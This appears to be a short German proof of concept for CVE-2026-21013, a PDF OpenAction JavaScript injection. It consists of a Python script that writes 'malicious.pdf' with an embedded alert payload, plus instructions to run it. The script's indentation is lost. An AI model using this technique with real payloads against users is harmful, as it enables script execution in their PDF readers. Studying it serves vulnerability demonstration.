
Erzeugt eine PDF mit eingebettetem JavaScript, um CVE-2026-21013 zu demonstrieren, eine OpenAction-Injection, die in anfälligen PDF-Readern zur Skriptausführung führt.
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
Ein PDF-Generator bereinigt benutzergelieferte Inhalte nicht, bevor er sie in die PDF-Datei einbettet. Ein Angreifer kann einen JavaScript-Eintrag /OpenAction injizieren, der beim Öffnen des Dokuments ausgeführt wird, was zu Cross-Site-Scripting (in Web-Viewern) oder lokaler Codeausführung (in Desktop-Readern mit voller JS-Unterstützung) führt.
Führen Sie den Generator aus:
python generate_pdf_js_inject.py
Öffnen Sie die resultierende malicious.pdf in einem PDF-Reader, der JavaScript unterstützt; ein Alert-Dialogfeld wird angezeigt.